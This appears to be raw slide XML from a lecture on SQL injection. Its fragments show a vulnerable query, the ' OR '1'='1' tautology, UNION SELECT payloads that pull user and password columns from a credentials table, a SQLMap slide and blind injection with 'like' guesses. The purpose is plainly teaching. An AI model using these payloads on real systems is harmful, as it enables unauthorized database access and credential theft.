                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>first</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400" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FEFB00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>last</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FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="sng"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id</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r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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$id</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55516C4E-CCEE-4C8C-A30A-BC79FACAFF9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123321" y="3133633"/>
            <a:ext cx="1165509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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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john, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>mcclane</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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> OR '1'='1'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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(evaluates to </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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>TRUE)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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>john,mcclane</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hanz,gruber</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FCF2B1-01D3-434F-B881-5041508F0B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123322" y="4104194"/>
            <a:ext cx="117638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rPr>
              <a:t> union select </a:t>
            </a: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rPr>
              <a:t>version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error: column mismatch (want 2, got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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="8FD8F8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>version,2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version,2 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E3EE3D7-38B0-42EA-AF66-128116CD8E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123322" y="5132428"/>
            <a:ext cx="1188579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rPr>
              <a:t> union select * from credentials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error: column mismatch (want 2, got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id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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="8FD8F8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>union all select user, password from credentials # </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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a:t>
            </a:r>
            <a:b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b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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>jmcclane,YippeeKayYay</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hgruber,notaterrorist</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1"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 ] ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="&quot;Not Allowed&quot; Symbol 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6501A4C9-F4C9-4E15-8C48-34971F70F8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733676" y="3548551"/>
            <a:ext cx="210246" cy="210246"/>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00108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80211-8635-4C44-932E-7C07C9CE1E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AC93932-094B-48AB-950C-3806819D0170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Union Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013F9EC5-EF8F-4D6C-8211-F0957D3F1766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="1475236"/>
            <a:ext cx="3877216" cy="1609950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0024468-01BB-434C-AB5B-3DB506D43406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4397218" y="1475236"/>
            <a:ext cx="3218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Good query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5CD2BD-3D3E-4F08-8DCD-5BB427AB765E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="3642990"/>
            <a:ext cx="10640910" cy="1143160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16F9663-163D-4F9A-8A84-940FE75A360D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076661" y="3181325"/>
            <a:ext cx="3998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Entered a single quote ( ' )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C41858D-6F28-4DD5-8B7C-B9F990B74901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5934314" y="3642990"/>
            <a:ext cx="575817" cy="4039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0755B8C9-4501-4A75-88E3-DD52C03CE3DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744314" y="4284478"/>
            <a:ext cx="575817" cy="4039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D254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1425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80211-8635-4C44-932E-7C07C9CE1E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FAC93932-094B-48AB-950C-3806819D0170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Union Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16F9663-163D-4F9A-8A84-940FE75A360D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159031" y="1392282"/>
            <a:ext cx="68275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Statement evaluates to ‘true’, so this returns all database entries for the requested data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05642E3-4F6B-431F-A8A3-6148F8F17D7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="719535" y="1471349"/>
            <a:ext cx="4314286" cy="4412616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806D99E0-CBA7-4282-8620-CE34528C92D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="14458"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729505" y="2973550"/>
            <a:ext cx="6147755" cy="1769165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C84EE3E-DB01-45BE-8A3C-FDC916DF39DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5609605" y="4742715"/>
            <a:ext cx="606350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FD8F8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>After determining how many columns are returned, can get more specific data from other queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3938ECBE-3774-43D0-9BB9-C17CA62BCC16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7533534" y="3588027"/>
            <a:ext cx="1" cy="365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6D2CB3-3062-4AEF-88F2-4B8CD5D5DDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6828183" y="3440133"/>
            <a:ext cx="1461052" cy="844826"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 117347"/>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028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4DF925-BBC8-4330-8CFC-4F17B16804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A9474E8-1E45-4903-8685-6AB9A8699D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy(er) Mode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC328D08-CA2D-487F-80A1-01D8236E9D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="8918505" cy="513522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>NOT FOR THE EXAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F4FEEEC-6D71-435A-8A74-08737F5E72C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752265" y="2325755"/>
            <a:ext cx="7825201" cy="2508077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468E2DB4-4C2A-480F-ACD3-C59D7110112B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063285" y="3532731"/>
            <a:ext cx="5628692" cy="1814623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FD6520-BBF8-49E8-B3D5-1FEA7642653A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4774926" y="4440139"/>
            <a:ext cx="7063180" cy="1390844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4099604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E633DD-C44B-4652-BB88-5A652F8669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E35581A-CD87-4B73-946C-7711B505A31F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind SQLi Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF5B4EB-B99C-4E72-B404-BBAED3A13639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1864483"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query only returns true/false output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to enumerate by hand – can write a Python script to send requests using true/false statements (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"and password like '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…’”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0AEF15-9F00-46E4-920E-21ACDADA8197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="25589"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434051" y="3386593"/>
            <a:ext cx="4416246" cy="1409897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2523EB7-49CE-4C4F-9913-D397921377D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
